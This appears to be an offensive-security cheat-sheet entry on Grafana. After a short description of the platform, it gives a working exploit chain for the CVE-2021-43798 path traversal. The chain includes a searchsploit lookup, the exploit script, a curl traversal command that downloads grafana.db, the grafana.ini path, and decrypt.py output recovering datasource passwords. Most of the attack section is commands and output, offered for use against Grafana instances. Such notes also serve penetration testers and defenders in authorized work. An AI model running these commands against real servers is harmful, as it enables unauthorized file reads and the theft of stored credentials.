Grafana

Grafana is an open-source analytics and visualization platform used to monitor time-series data from sources like Prometheus, InfluxDB, Elasticsearch, and many others. It provides dashboards, alerting, and flexible query capabilities, making it a popular choice for infrastructure and application monitoring.

By default, Grafana runs on port 3000 and includes a web interface with user roles and data source integrations. Misconfigured or outdated instances often expose sensitive metrics, credentials, or admin access. Authentication bypasses, API abuse, and plugin vulnerabilities have historically allowed PE and RCE.

LFI

Grafana versions 8.0.0-beta1 through 8.3.0 (except patched releases) are susceptible to a LFI vulnerability via the /public/plugins/<plugin_id>/ URL path. This vulnerability enables attackers to access local files on the server by manipulating plugin IDs in the URL (CVE-2021-43798). A working PoC is publicly available.

• Default database file location → /var/lib/grafana/grafana.db

$ searchsploit grafana 8.3
Grafana 8.3.0 - Directory Traversal and Arbitrary File Read | multiple/webapps/50581.py

$ python3 50581.py -H http://grafanta-instance:3000

# Manually
$ curl -s --path-as-is "http://grafanta-instance:3000/public/plugins/alertlist/../../../../../../../../../../../../../var/lib/grafana/grafana.db" --output grafana.db

The default encryption used in Grafana is AES. A PoC is available to decrypt the key, but it needs the grafana.ini file. The default path for the configuration file is: /etc/grafana/grafana.ini.

$ uv run decrypt.py
? Enter the datasource password: <base64-encoded password>
[*] grafanaIni_secretKey= <inferred-key>
[*] DataSourcePassword= <inferred-password>
[*] plainText= <decrypted-password>